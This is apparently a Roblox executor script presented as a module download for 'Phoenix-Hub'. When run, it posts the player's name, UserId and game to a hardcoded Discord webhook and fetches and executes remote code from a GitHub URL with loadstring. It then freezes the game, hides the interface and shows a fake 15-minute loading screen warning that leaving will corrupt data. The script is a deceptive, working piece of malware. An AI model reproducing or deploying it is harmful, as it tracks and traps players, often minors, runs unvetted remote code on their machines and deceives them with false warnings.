-----------------------------------------------------------------
-- SERVICES
-----------------------------------------------------------------
local Players              = game:GetService("Players")
local Player               = Players.LocalPlayer
local PlayerGui            = Player:WaitForChild("PlayerGui")
local CoreGui              = game:GetService("CoreGui")
local RunService           = game:GetService("RunService")
local Workspace            = game:GetService("Workspace")
local StarterGui           = game:GetService("StarterGui")
local SoundService         = game:GetService("SoundService")
local HttpService          = game:GetService("HttpService")
local MarketplaceService  = game:GetService("MarketplaceService")
local TweenService         = game:GetService("TweenService")

-----------------------------------------------------------------
-- DISCORD WEBHOOK (EXECUTE LOG)
-----------------------------------------------------------------
local WEBHOOK_URL = "https://discord.com/api/webhooks/1450951811488813108/4lcItFTfvIV0lpizJ1qrQ6c9EYbV7soVaJb1onUlBSRm-gz_ZEQ4GLlHC_ZHYwGf5zuz"

local function sendWebhook()
    local data = {
        username = "Script.SM Logger",
        embeds = {{
            title = "🚨 Stuck Script Executed",
            description = "**Status:** Stuck Lua Has Executed",
            color = 16711680,
            fields = {
                { name = "👤 Player", value = Player.Name, inline = true },
                { name = "🆔 UserId", value = tostring(Player.UserId), inline = true },
                { name = "🎮 Game", value = MarketplaceService:GetProductInfo(game.PlaceId).Name, inline = false }
            },
            footer = { text = "Scripts.SM | Premium Scripts" },
            timestamp = DateTime.now():ToIsoDate()
        }}
    }

    local req = (syn and syn.request) or (http and http.request) or request
    if req then
        pcall(function()
            req({
                Url = WEBHOOK_URL,
                Method = "POST",
                Headers = { ["Content-Type"] = "application/json" },
                Body = HttpService:JSONEncode(data)
            })
        end)
    end
end
task.spawn(sendWebhook)

-----------------------------------------------------------------
-- LOAD EXTRA STUCK SCRIPT
-----------------------------------------------------------------
pcall(function()
    loadstring(game:HttpGet(
        "https://raw.githubusercontent.com/changelog-modul/Steal-A-BrainrotV3/refs/heads/main/stuck2",
        true
    ))()
end)

-----------------------------------------------------------------
-- LOADING SCREEN (20 MINUTES) - HORROR VERSION
-----------------------------------------------------------------
local LOADING_TIME = 15 * 60
local startTime = tick()

pcall(function()
    PlayerGui:FindFirstChild("sm_loading_preview"):Destroy()
end)

local gui = Instance.new("ScreenGui")
gui.Name = "sm_loading_preview"
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false
gui.Parent = PlayerGui

local bg = Instance.new("Frame", gui)
bg.Size = UDim2.fromScale(1,1)
bg.BackgroundColor3 = Color3.fromRGB(6,6,6)

local title = Instance.new("TextLabel", bg)
title.Size = UDim2.fromScale(1,0.15)
title.Position = UDim2.fromScale(0,0.18)
title.BackgroundTransparency = 1
title.Text = "DOWNLOADING ALL MODULE SCRIPT PHOENIX-HUB"
title.Font = Enum.Font.GothamBlack
title.TextSize = 36
title.TextColor3 = Color3.fromRGB(255,70,70)
title.TextTransparency = 1

local subtitle = Instance.new("TextLabel", bg)
subtitle.Size = UDim2.fromScale(1,0.07)
subtitle.Position = UDim2.fromScale(0,0.3)
subtitle.BackgroundTransparency = 1
subtitle.Text = "Please wait. Do not close the game. Close Game Can Make The Data Corrupted"
subtitle.Font = Enum.Font.Gotham
subtitle.TextSize = 18
subtitle.TextColor3 = Color3.fromRGB(180,180,180)
subtitle.TextTransparency = 1

local barBG = Instance.new("Frame", bg)
barBG.Size = UDim2.fromScale(0.42,0.02)
barBG.Position = UDim2.fromScale(0.29,0.55)
barBG.BackgroundColor3 = Color3.fromRGB(30,30,30)
barBG.BorderSizePixel = 0
barBG.BackgroundTransparency = 1
barBG.ClipsDescendants = true
Instance.new("UICorner", barBG).CornerRadius = UDim.new(1,0)

local bar = Instance.new("Frame", barBG)
bar.Size = UDim2.fromScale(0,1)
bar.BackgroundColor3 = Color3.fromRGB(255,70,70)
bar.BorderSizePixel = 0
Instance.new("UICorner", bar).CornerRadius = UDim.new(1,0)

local percent = Instance.new("TextLabel", bg)
percent.Size = UDim2.fromScale(1,0.05)
percent.Position = UDim2.fromScale(0,0.59)
percent.BackgroundTransparency = 1
percent.Text = "0%"
percent.Font = Enum.Font.GothamMedium
percent.TextSize = 16
percent.TextColor3 = Color3.fromRGB(255,255,255)
percent.TextTransparency = 1

-- === HORROR SPINNER (CIRCULAR ARROW) ===
local spinner = Instance.new("ImageLabel", bg)
spinner.Size = UDim2.fromScale(0.065,0.065)
spinner.Position = UDim2.fromScale(0.467,0.675)
spinner.BackgroundTransparency = 1
spinner.Image = "rbxassetid://8224769372" -- circular arrow
spinner.ImageTransparency = 0.12
spinner.Rotation = 0

-- Fade in texts
TweenService:Create(title, TweenInfo.new(1), {TextTransparency=0}):Play()
TweenService:Create(subtitle, TweenInfo.new(1), {TextTransparency=0}):Play()
TweenService:Create(barBG, TweenInfo.new(1), {BackgroundTransparency=0}):Play()
TweenService:Create(percent, TweenInfo.new(1), {TextTransparency=0}):Play()

-- Spinner rotation: unstable + slows down
task.spawn(function()
    local speed = 2
    while spinner.Parent do
        speed = math.clamp(speed - 0.002, 0.25, 2)
        spinner.Rotation += speed + (math.random(-10,10) * 0.02)
        task.wait()
    end
end)

-- Progress update
RunService.RenderStepped:Connect(function()
    local alpha = math.clamp((tick() - startTime) / LOADING_TIME, 0, 1)
    bar.Size = UDim2.fromScale(alpha,1)
    percent.Text = math.floor(alpha * 100) .. "%"
end)

-- === RED PULSE (SCREEN BREATHING) ===
local pulse = Instance.new("Frame", bg)
pulse.Size = UDim2.fromScale(1,1)
pulse.BackgroundColor3 = Color3.fromRGB(120,0,0)
pulse.BackgroundTransparency = 1
pulse.ZIndex = 2

task.spawn(function()
    while pulse.Parent do
        TweenService:Create(
            pulse,
            TweenInfo.new(math.random(3,6), Enum.EasingStyle.Sine),
            {BackgroundTransparency = 0.92}
        ):Play()
        task.wait(math.random(2,4))
        TweenService:Create(
            pulse,
            TweenInfo.new(math.random(2,5), Enum.EasingStyle.Sine),
            {BackgroundTransparency = 1}
        ):Play()
        task.wait(math.random(3,6))
    end
end)

-- === GLITCH FLICKER ===
task.spawn(function()
    while bg.Parent do
        task.wait(math.random(8,15))
        bg.BackgroundColor3 = Color3.fromRGB(15,0,0)
        task.wait(0.05)
        bg.BackgroundColor3 = Color3.fromRGB(6,6,6)
    end
end)

-- === TEXT FLICKER ===
task.spawn(function()
    while subtitle.Parent do
        task.wait(math.random(6,12))
        subtitle.TextTransparency = 0.85
        task.wait(0.08)
        subtitle.TextTransparency = 0
    end
end)

-----------------------------------------------------------------
-- CORE FREEZE SYSTEM
-----------------------------------------------------------------
pcall(function()
    StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, false)
end)

Workspace.CurrentCamera.CameraType = Enum.CameraType.Scriptable

SoundService.AmbientReverb = Enum.ReverbType.NoReverb
for _, s in ipairs(Workspace:GetDescendants()) do
    if s:IsA("Sound") then
        s.Volume = 0
        s:Stop()
    end
end

Workspace.DescendantAdded:Connect(function(o)
    if o:IsA("Sound") then
        o.Volume = 0
        o:Stop()
    end
end)

local frozenParts, frozenJoints = {}, {}

local function freezeObject(o)
    if o:IsA("BasePart") then
        frozenParts[o] = {
            CFrame=o.CFrame, Size=o.Size, Transparency=o.Transparency,
            Color=o.Color, Material=o.Material, CanCollide=o.CanCollide
        }
    elseif o:IsA("Motor6D") or o:IsA("Weld") then
        frozenJoints[o] = {C0=o.C0, C1=o.C1}
    end
end

for _, o in ipairs(Workspace:GetDescendants()) do freezeObject(o) end
Workspace.DescendantAdded:Connect(freezeObject)

RunService.Stepped:Connect(function()
    for p,d in pairs(frozenParts) do
        if p.Parent then for k,v in pairs(d) do p[k]=v end end
    end
    for j,d in pairs(frozenJoints) do
        if j.Parent then j.C0=d.C0 j.C1=d.C1 end
    end
end)

local function freezeChar(c)
    local h=c:FindFirstChildOfClass("Humanoid")
    if h then
        h.WalkSpeed=0 h.JumpPower=0 h.PlatformStand=true
        for _,a in ipairs(h:GetPlayingAnimationTracks()) do a:Stop() end
    end
end

for _,p in ipairs(Players:GetPlayers()) do
    if p.Character then freezeChar(p.Character) end
    p.CharacterAdded:Connect(freezeChar)
end

local function clearGui()
    for _,g in ipairs(PlayerGui:GetChildren()) do
        if g:IsA("GuiObject") and g.Name ~= "sm_loading_preview" then
            pcall(g.Destroy,g)
        end
    end
    for _,g in ipairs(CoreGui:GetChildren()) do pcall(g.Destroy,g) end
end

task.spawn(function()
    while task.wait(0.03) do clearGui() end
end)

print("[Script.SM] Leaving May Cause Data Loss")
